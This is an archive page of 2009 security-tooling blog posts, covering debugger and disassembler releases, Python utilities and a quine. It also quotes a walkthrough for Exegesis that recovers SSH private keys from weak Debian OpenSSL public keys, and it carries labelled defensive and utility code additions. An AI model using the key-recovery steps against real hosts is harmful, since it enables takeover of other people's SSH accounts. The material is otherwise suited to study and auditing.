Breaking Code

June 16, 2009

WinAppDbg version 1.2 is out!

Filed under: Tools — Mario Vilas @ 7:23 pm

What is WinAppDbg?

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience is QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready-to-use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86 native code (using the open source diStorm project), debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

Where can I find WinAppDbg?

The WinAppDbg project is currently hosted at Sourceforge, and can be found at:

http://winappdbg.sourceforge.net/

It’s also hosted at the Python Package Index (PyPi):

http://pypi.python.org/pypi/winappdbg/1.2

May 28, 2009

Exegesis – A toolkit for abusing the broken PRNG in Debian OpenSSL

Filed under: Tools — Mario Vilas @ 9:05 pm

A new tool has just been released to exploit the Debian OpenSSL bug; it’s called Exegesis. It seems very interesting, and it’s more complete and flexible than all of the existing ones. Definitely worth checking out!

Let’s see the description from its webpage:

Exegesis
--------

So you have an ssh public authentication key and you 'lost' the
private key.  Did you generate that key in the last two years on
Debian or Ubuntu GNU/Lunix?  Yes?  Ok, great.  

$ cat id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBAIW0doTjIKPNwAjHogbLhXNxNlwdvHHKzFPgZ
5cpwF4a2e8YYlEyXo8gyoub5c2s0f8B61ZNkowc9tcN+Iy1aiE2LBloxds3IwWNpZ
8KnJruCX/mYbltUp3CNJP/8gmeL41akUddPJ5wg6pYjDY5z7Kd9lojhqKOn3qSPXZ
JDJXJAAAAFQDZMKlBeKVX9/FCO5auyzPHxn6QnwAAAIBULtChrN1rGfAjIU8VZwQa
rQNunGFDfstWNOcx0lvAm2DkQCVCFT8DUXlibHWQJJbeMk3DfOl02ItIAhMvTTAPM
rb8vtFsB3Fcw7KAuK0cAJaY3R2S6/tBbWXch7SaaOQ4dxa+8hmEl54icW/me0H6Z0
SEDYEm3j8pnAUnPAu/pgAAAIALkFjo4rsTTcSyW841Gdy+rhsH4St3dd4ZXiTdDVh
wCbpBqSqiYxZO/gBHdCDAIs2uD8+GElpv7Q5Hx0g5JYLoBCpa1O8R2UAZMapZORRE
umPRs6buJ4GMf33S5f/WSqdFaMo1+/67VkvUS/9Drtb7Mz3aI/QUIh1H3gfT0xFIm
A== lamer@gnubuntu

First you'll need the fingerprint.

$ ssh-keygen -l -f ./id_dsa.pub
1024 b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c ./id_dsa.pub

Now look for that fingerprint in the generated fingerprint database
files.  You can just use 'grep' for this.

$ grep b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c dsa_1024_32_le.out
b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c 25191 dsa 1024 32 0

Oh, it's your lucky day!  You're on the list.

The fingerprint database files have the following format:

  fingerprint pid key_type key_bits arch big_endian

  pid        The process id of the ssh-keygen which originally generated the key
  key_type   Either 'dsa' or 'rsa' depending on the type of key
  key_bits   The size of the key.  1024 and 2048 are common.
  arch       Either 32 or 64 depending on the processor which the key was created on
  big_endian Is 1 if the key was generated on a big endian box or 0 otherwise

So, the key we matched is a 1024 bit DSA key, generated on a 32 bit little endian
processor.  That sounds about right.

$ ./exegesis
Usage: ./exegesis [options]
Options:
  -B            Select big endian target (default is little endian target).
  -A            Selecet 64 bit target (default is 32 bit target)
  -o <file>     Output file.
  -t (dsa|rsa)  Type of key(s) to generate (default is rsa)
  -b bits       Key size to generate in bits (default is 1024 bits)
  -g            Generate all keys for a range of pids (all pids by default)
  -r start,end  Specify a pid range to generate (default is 1,32768)
  -p pid        Generate a key for a chosen pid value

$ ./exegesis -t dsa -b 1024 -p 25191
-----BEGIN DSA PRIVATE KEY-----
[key material omitted]
-----END DSA PRIVATE KEY-----

Whoah?! Is that really the private key?  Let's compare it to the
original key generated with ssh-keygen

$ ./exegesis -t dsa -b 1024 -p 25191 > key.out
$ md5sum id_dsa key.out
0aa477a9a01c6724708f9f362bcf0f7d  id_dsa
0aa477a9a01c6724708f9f362bcf0f7d  key.out

Generating Databases
--------------------

$ ./exegesis -g -t dsa -b 1024 -o dsa_1024_32_le.out

Unlike inferior competing products, Exegesis models the backdoored PRNG
in Debian OpenSSL.  It uses a version of the OpenSSL random number and
key generating code that can be configured to behave like any of the
hardware platforms that affect the generated random numbers.

This means you can generate databases for each different relevant hardware
configuration without actually needing to run it on those architectures.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

WARNING: Generating your own databases takes a very long time and may
         cause side effects such as acute boredom and drowsiness.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Since we know you're anxious to get started recovering all those misplaced
private SSH keys, this release of Exegesis conveniently includes, right out
of the box, ten starter databases at no extra charge!

$ md5 keysets/*
MD5 (keysets/dsa_1024_32_be.out) = d422aa60e3d6180ec65adb7179ebe43d
MD5 (keysets/dsa_1024_32_le.out) = d6f1e5f4d5dd9e84a05de47cc9e0e81a
MD5 (keysets/dsa_1024_64_le.out) = 89d34fe52f083c7e0c2297c2d8439bbc
MD5 (keysets/dsa_2048_32_le.out) = b81ca4cd84613c0fa19056036153fc62
MD5 (keysets/dsa_2048_64_le.out) = f914df33f27a11d7b2ab06446c6c13ec
MD5 (keysets/rsa_1024_32_be.out) = f5a13ffcbc63206d1c90850e2ad2e052
MD5 (keysets/rsa_1024_32_le.out) = 082b47d57e1d77366ce3795359926440
MD5 (keysets/rsa_1024_64_le.out) = 18c80767c00db8130da8a77f7e81f448
MD5 (keysets/rsa_2048_32_le.out) = 977b88495603c860abbd48a47847065a
MD5 (keysets/rsa_2048_64_le.out) = dcdd098089281388e1c3bc935dec5b7e

ps:

This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)

Download
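The lookup the README above describes, done from the defender's side: this is an added example, not part of this post or of the Exegesis distribution. It computes the colon-separated MD5 fingerprint that `ssh-keygen -l` printed at the time (MD5 over the base64-decoded key blob), parses records in the `fingerprint pid key_type key_bits arch big_endian` format, picks the database file name following the `dsa_1024_32_le.out` convention, and audits a list of public key lines against the records so that any key on the list can be replaced. The first sample record is the one shown in the README; the second record and the key lines are constructed for this example, and the code assumes plain `type base64 comment` key lines without an authorized_keys options prefix. Names such as `load_db`, `check_key` and `audit_keys` are this example's own.

```python
import base64
import hashlib

# Constructed sample in the database format the README describes:
#   fingerprint pid key_type key_bits arch big_endian
# The first record is the one shown in the README; the second is made up for
# this example (its fingerprint is simply MD5 of the bytes b"abc").
SAMPLE_DB_LINES = [
    "b2:f0:f6:47:19:64:ff:8e:8f:90:75:bd:57:6c:71:0c 25191 dsa 1024 32 0",
    "90:01:50:98:3c:d2:4f:b0:d6:96:3f:7d:28:e1:7f:72 4242 rsa 2048 64 0",
]


def ssh_md5_fingerprint(pubkey_line):
    """Colon-separated MD5 fingerprint of an OpenSSH public key line
    ("ssh-dss AAAA... comment"): MD5 over the base64-decoded key blob,
    which is what `ssh-keygen -l` printed before OpenSSH moved to SHA-256.
    Assumes a plain key line without an authorized_keys options prefix."""
    fields = pubkey_line.split()
    if len(fields) < 2:
        raise ValueError("not an OpenSSH public key line")
    blob = base64.b64decode(fields[1])
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def parse_db_line(line):
    """One database record -> dict with typed fields."""
    fp, pid, key_type, key_bits, arch, big_endian = line.split()
    return {
        "fingerprint": fp,
        "pid": int(pid),
        "key_type": key_type,
        "key_bits": int(key_bits),
        "arch": int(arch),
        "big_endian": big_endian == "1",
    }


def load_db(lines):
    """Index records by fingerprint; blank lines are skipped."""
    db = {}
    for line in lines:
        line = line.strip()
        if line:
            rec = parse_db_line(line)
            db[rec["fingerprint"]] = rec
    return db


def db_filename(key_type, key_bits, arch, big_endian):
    """Name of the database file to search, following the naming the README
    shows (for example dsa_1024_32_le.out)."""
    endian = "be" if big_endian else "le"
    return "%s_%d_%d_%s.out" % (key_type, key_bits, arch, endian)


def check_key(pubkey_line, db):
    """Matching record if the key's fingerprint is in the database, else None.
    A match means the key came from the broken PRNG and must be replaced."""
    return db.get(ssh_md5_fingerprint(pubkey_line))


def audit_keys(lines, db):
    """Scan public key lines (e.g. concatenated *.pub files) and return
    (line_number, record) for every key found in the database."""
    hits = []
    for number, line in enumerate(lines, 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        record = check_key(line, db)
        if record is not None:
            hits.append((number, record))
    return hits


if __name__ == "__main__":
    weak = load_db(SAMPLE_DB_LINES)
    # Constructed key line whose blob is b"abc", so it matches the second record.
    for number, record in audit_keys(["ssh-rsa YWJj test@example"], weak):
        print("line %d: weak %s key (pid %d, see %s)" % (
            number, record["key_type"], record["pid"],
            db_filename(record["key_type"], record["key_bits"],
                        record["arch"], record["big_endian"])))
```

The example only compares fingerprints and never touches key material; a hit is a key to revoke and replace, and the `pid`, `arch` and `big_endian` columns merely record how the matching entry was produced.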

May 27, 2009

Using diStorm with Python 2.6 and Python 3.x

Filed under: Tools — Mario Vilas @ 12:14 am

diStorm is currently my favorite disassembler for Intel platforms. It’s small, fast, compiles virtually anywhere, and it’s got Python bindings for 2.3, 2.4 and 2.5. The only problem so far was trying to use it with Python 2.6 and above – the library has to be recompiled for each new version. To solve this problem a pure Python module using ctypes is shipped – but its interface is different from the C module’s, forcing us to code different routines.

So my solution was to code my own ctypes-based diStorm bindings. It’s compatible with the C version and it works in all Python 2.x versions. The DLL library has to be present in the path for it to work.

I’ve also ported it to Python 3.x. Both versions are tested under Windows only, however it should work correctly under Linux – let me know if you try it!

Here is also an example script using diStorm to disassemble a raw binary file. Could come in handy for example to disassemble the shellcode contained in an exploit, or to find anything that resembles shellcode in a packet capture.

Update


May 18, 2009

WinAppDbg 1.1 released

Filed under: Tools — Mario Vilas @ 1:18 am

New version of WinAppDbg!

New features include:

  • New tool: a simple command line debugger that supports plugins.
  • Added support for Microsoft debugging symbols.
  • Added support for py2exe, to generate standalone executables.
  • New Win32 API functions added to win32.py
  • Improvements to the breakpoints support, now “stalking” works for memory buffers and variables too.

This new version contains some bugfixes, so if you were using 1.0 I very much recommend upgrading.

Download

April 21, 2009

WinAppDbg v1.0 is out!

Filed under: Tools — Mario Vilas @ 4:51 pm

What is WinAppDbg?

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows.

The intended audience is QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready-to-use utilities are shipped and can be used for these purposes.

Current features also include disassembling x86 native code (using the open source diStorm project), debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

Where can I find WinAppDbg?

The WinAppDbg project is currently hosted at Sourceforge, and can be found at:

http://winappdbg.sourceforge.net/

February 6, 2009

Manipulating windows belonging to other processes

Filed under: Tools — Mario Vilas @ 4:51 pm

Hello again. 🙂

Here’s a Python script that can be used to write Windows UI fuzzers and testers. It requires the win32 python extensions that can be downloaded from here (already included in the ActiveState distribution).

Enjoy!

Download the code: Window.py

January 5, 2009

Topo Facts!

Filed under: Just for fun — Mario Vilas @ 10:37 pm

WARNING: Inside jokes, just skip ahead to read the next post please 😉

Here they are, the infamous Topo Facts!

  • Topo can own your box by just staring at the monitor screen.
  • Topo never did his homework as a kid. He had a botnet to do it for him.
  • When Topo needs some ice for his whisky, there’s a hailstorm in Buenos Aires.
  • Topo taught Don Corleone all he knows.
  • Topo knows the Meaning of Life, the Universe and Everything, but he refuses to share it. He says the world is not ready for that knowledge yet.
  • When Mankind reached the Moon, there was a Topo flag there already.
  • Topo never pays his bills. It’s the governments of the world that pay him.
  • God created the Universe in one week. Topo created God one boring Sunday afternoon after he ran out of mate and biscuits.
  • Topo can walk under the rain without getting wet. Raindrops are just too scared of touching him.
  • Topo built the Pyramids one day he was playing soccer and needed something to mark the goals.
  • No, Elvis is not dead. He just went home… to Topo’s home.
  • Topo was the real cause of the end of the Cold War. He wanted to make a garage sale with all his nuclear submarines.
  • Topo taught Maradona how to play soccer, because he felt sorry to see the poor guy play so badly.
  • Topo can tell the difference between modern art and pop subculture with just one glance.
  • Topo can calculate the integral of e ^ (t ^ 2) dt in his head.
  • Topo doesn’t sign NDAs to corporations. Corporations sign NDAs to him.
  • Clippo never dares to pop up when Topo uses MS Word.
  • When the Third World War comes, the only survivors will be roaches and Topo.
  • Topo coded DOS in five minutes but didn’t like it, so he gave it away to some guy named Bill… Doors or something.
  • When Mankind reached the Moon, besides the Topo flag, there was also a post-it saying “NASA, don’t leave your shit here. Topo”. Since they disobeyed, flights to the Moon were canceled decades ago.
  • Chuck Norris was jealous of Topo and stole some of his Facts.
  • Secret x86 instructions inserted by Topo:
    JT: Jump if Topo
    TTS: Test if Topo, then Surrender
    HLTN: HALT, Topo is Near
    SPT: Send Password to Topo
    CRS: Call Russian Submarine
    SCTR: Store Credit Card in Topo Register
    AYBABTT: All Your Base Are Belong To Topo

Credits go to the cool people at Core. But only the cool ones… you know who you are. 🙂

December 23, 2008

Working with Property List files in Python

Filed under: Tools — Mario Vilas @ 7:25 pm

Update: Python 2.6 now supports .plist files using the plistlib module, check it out!

Hi all. Today we have a tool I wrote some time ago to work with Mac OS Property List (.plist) files. These files have an XML-based format, and can serialize high-level objects like integers, floats, strings, arrays and dictionaries. There’s also a legacy plist format that doesn’t use XML and should also be easy to parse, but we won’t bother with it since it’s been deprecated in Mac OS 10.0. Here is the Wikipedia entry on Property List files for more details.

Here’s an example Property List file, taken from the Mac OS X Manual Page for plist:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
        "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
        <dict>
            <key>Year Of Birth</key>
            <integer>1965</integer>
            <key>Pets Names</key>
            <array/>
            <key>Picture</key>
            <data>
                PEKBpYGlmYFCPA==
            </data>
            <key>City of Birth</key>
            <string>Springfield</string>
            <key>Name</key>
            <string>John Doe</string>
            <key>Kids Names</key>
            <array>
                <string>John</string>
                <string>Kyra</string>
            </array>
        </dict>
    </plist>

As we can see, the data types supported by plist files are also supported natively by Python, so mapping Python objects to Property Lists should be quite straightforward, and it is. What I’m presenting here is a little tool that does the marshalling and unmarshalling, so you can use it pretty much like you would use Pickle, Shelve or Marshal.

A usage example. The following code reads the example plist file from above and produces a Python object, using the fromfile method.

    from PList import PList
    plist = PList.fromfile('example.plist')

Yeah, kinda simple, isn’t it 🙂

You can also load a plist from a string, using the fromstring method:

    from PList import PList
    data  = open('example.plist', 'r').read()
    plist = PList.fromstring(data)

Or from an ElementTree object, with the fromtree method:

    from PList import PList
    from xml.etree import ElementTree
    tree  = ElementTree.parse('example.plist')
    plist = PList.fromtree(tree)

In all cases the output is an ordinary Python object, typically a dictionary or an array containing other objects. This is the Python object corresponding to the example plist shown above:

    {'City of Birth': 'Springfield',
     'Kids Names': ['John', 'Kyra'],
     'Name': 'John Doe',
     'Pets Names': [],
     'Picture': '<B\x81\xa5\x81\xa5\x99\x81B<',
     'Year Of Birth': 1965}

You can also write Python objects as Property List files. The output can be a string (the tostring method), an ElementTree tree (totree method) or a file (tofile method).

    from PList import PList
    PList.tofile('output.plist', plist)

Download the code: PList.py
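The same round trip done with the standard library module the update at the top of this post points to, plistlib, as an added example that is not the post’s PList.py. It parses the example plist from the manual page (embedded below as bytes, with one `<data>` element split across lines exactly as in the example), yielding the Python object shown above except that Python 3 returns `bytes` for `<data>`; it then writes the object back out, parses that again, and shows the failure mode a marshaller of arbitrary objects has to handle: plistlib raises `TypeError` for values that have no plist type, such as `None` or a `set`. The helper names (`load_plist`, `dump_plist`, `roundtrip`, `is_plist_serializable`) are this example’s own; it needs Python 3.4 or later for `plistlib.loads` and `plistlib.dumps`.

```python
import plistlib

# The example plist from the post (the one in the Mac OS X manual page for
# plist), embedded here as bytes so the example runs without a file.
EXAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
    "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
        <key>Year Of Birth</key>
        <integer>1965</integer>
        <key>Pets Names</key>
        <array/>
        <key>Picture</key>
        <data>
            PEKBpYGlmYFCPA==
        </data>
        <key>City of Birth</key>
        <string>Springfield</string>
        <key>Name</key>
        <string>John Doe</string>
        <key>Kids Names</key>
        <array>
            <string>John</string>
            <string>Kyra</string>
        </array>
    </dict>
</plist>
"""


def load_plist(data):
    """Unmarshal XML plist bytes into plain Python objects: dict, list, str,
    int, float, bool, bytes (for <data>) and datetime (for <date>)."""
    return plistlib.loads(data)


def dump_plist(obj):
    """Marshal a Python object back to XML plist bytes (keys written sorted)."""
    return plistlib.dumps(obj, sort_keys=True)


def roundtrip(obj):
    """Serialize and parse again; equal to the input for supported types."""
    return load_plist(dump_plist(obj))


def is_plist_serializable(obj):
    """plistlib raises TypeError for values with no plist type (None, set,
    arbitrary objects), so a marshaller has to reject or convert them first."""
    try:
        plistlib.dumps(obj)
        return True
    except TypeError:
        return False


if __name__ == "__main__":
    obj = load_plist(EXAMPLE_PLIST)
    print(obj)
    print(dump_plist(obj).decode("utf-8"))
    print(is_plist_serializable({"bad": None}))
```

Note that `<data>` comes back as `bytes`, so code that compares it with the Python 2 string shown above (`'<B\x81\xa5...'`) needs to compare against `b'<B\x81\xa5...'` instead.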

bin2py.py

Filed under: Tools — Mario Vilas @ 6:14 pm

Hi there folks.

Here’s a little tool I coded quite some time ago, and probably we’ve all done the same at one time or another, maybe over and over again. It’s yet another binary-to-Python-code converter. The catch is, this one has a few extra options that may come in handy…

  • Encodes using repr(), hexadecimal or base64
  • Compress with zlib or gzip
  • Also generates the code to uncompress and/or decode the data
  • Can work with a batch of files
  • Can generate multiple output files, or merge all output into one file
  • Cross-platform, of course, since it’s made in Python 🙂

The code kinda sucks (no classes, all functions, lots of copy paste) but it works. Anyway, a friend told me it’d be a good idea to post it here, so here it is. Enjoy.

Updated

Aug 3, 2011: Added some speed optimizations.

Download the code: bin2py.py
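An added example, not the bin2py.py from this post: a small Python 3 version of the same idea that covers the three encodings listed above (repr, hex, base64) and the two compressors (zlib, gzip), emits the decoding and decompression code together with the data, and then executes the generated source in a fresh namespace to verify the round trip. The input bytes are constructed, and the function names (`bin2py`, `load_generated`, `roundtrip_all`) are this example’s own.

```python
import base64
import binascii
import gzip
import zlib

ENCODINGS = ("repr", "hex", "base64")
COMPRESSIONS = (None, "zlib", "gzip")


def compress(data, compression):
    """Optionally compress the raw bytes before encoding them."""
    if compression is None:
        return data
    if compression == "zlib":
        return zlib.compress(data, 9)
    if compression == "gzip":
        return gzip.compress(data)
    raise ValueError("unknown compression: %r" % (compression,))


def encode(data, encoding):
    """Return a Python literal (source text) holding the encoded bytes."""
    if encoding == "repr":
        return repr(data)                                    # b'...' literal
    if encoding == "hex":
        return repr(binascii.hexlify(data).decode("ascii"))  # '0a1b...'
    if encoding == "base64":
        return repr(base64.b64encode(data).decode("ascii"))  # 'Chs...'
    raise ValueError("unknown encoding: %r" % (encoding,))


def decode_expression(encoding, var):
    """Source expression turning the literal stored in `var` back into bytes."""
    if encoding == "repr":
        return var
    if encoding == "hex":
        return "bytes.fromhex(%s)" % var
    return "base64.b64decode(%s)" % var


def decompress_expression(compression, expr):
    """Wrap `expr` in the matching decompression call, if any."""
    if compression is None:
        return expr
    return "%s.decompress(%s)" % (compression, expr)


def bin2py(data, name="DATA", encoding="base64", compression="zlib"):
    """Generate Python source defining `name` as the original bytes, with the
    imports and the decode/decompress code that source needs to run."""
    modules = []
    if encoding == "base64":
        modules.append("base64")
    if compression is not None:
        modules.append(compression)
    lines = []
    if modules:
        lines.append("import " + ", ".join(modules))
    encoded_name = name + "_ENCODED"
    literal = encode(compress(data, compression), encoding)
    lines.append("%s = %s" % (encoded_name, literal))
    expr = decompress_expression(compression,
                                 decode_expression(encoding, encoded_name))
    lines.append("%s = %s" % (name, expr))
    return "\n".join(lines) + "\n"


def load_generated(source, name="DATA"):
    """Execute generated source in a fresh namespace and return the recovered
    bytes; used here only to verify the round trip on our own output."""
    namespace = {}
    exec(source, namespace)
    return namespace[name]


def roundtrip_all(data):
    """Map (encoding, compression) -> whether the generated code recovers data."""
    results = {}
    for encoding in ENCODINGS:
        for compression in COMPRESSIONS:
            source = bin2py(data, "BLOB", encoding, compression)
            results[(encoding, compression)] = load_generated(source, "BLOB") == data
    return results


if __name__ == "__main__":
    sample = bytes(range(256)) * 4   # constructed input that compresses well
    print(bin2py(b"\x00\x01\x02", "SAMPLE", "hex", None))
    print(roundtrip_all(sample))
```

The generated module only needs the standard library modules named in its own `import` line, which is the point of emitting the decoder alongside the data.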

November 29, 2008

Ouroboros.py

Filed under: Just for fun — Mario Vilas @ 2:41 am

This is a little nonsense I just wrote after reading the Wikipedia entry for Ouroboros. Turns out this kind of program already has a name too: Quine.

In this case it’s a Python script that uses InlineEgg to generate an ELF32 binary that generates a Python script that uses InlineEgg to generate an ELF32 binary that generates a Python script that uses InlineEgg to… well, you get the point. 🙂

Yeah, I know this is not really about computer security, but what the hell. It’s got Python and shellcode somewhere anyway.

A real Ouroboros!


Ouroboros.py

#!/usr/bin/python

from sys import argv, stdout
from inlineegg.inlineegg import InlineEgg, Linuxx86Syscall
from inlineegg.exelib import Elf32Program

# Read this very script's source: it becomes the payload the binary prints.
script = open(argv[0], 'r').read()

# Build a Linux/x86 egg that writes the script to stdout (fd 1) and exits.
egg = InlineEgg(Linuxx86Syscall)
egg.write(1, script, len(script))
egg.exit(0)

# Wrap the egg in a minimal ELF32 executable and emit it on stdout.
prg = Elf32Program()
prg.arch = prg.ARCH_I386
prg.addCode(str(egg))
stdout.write(prg.bytes())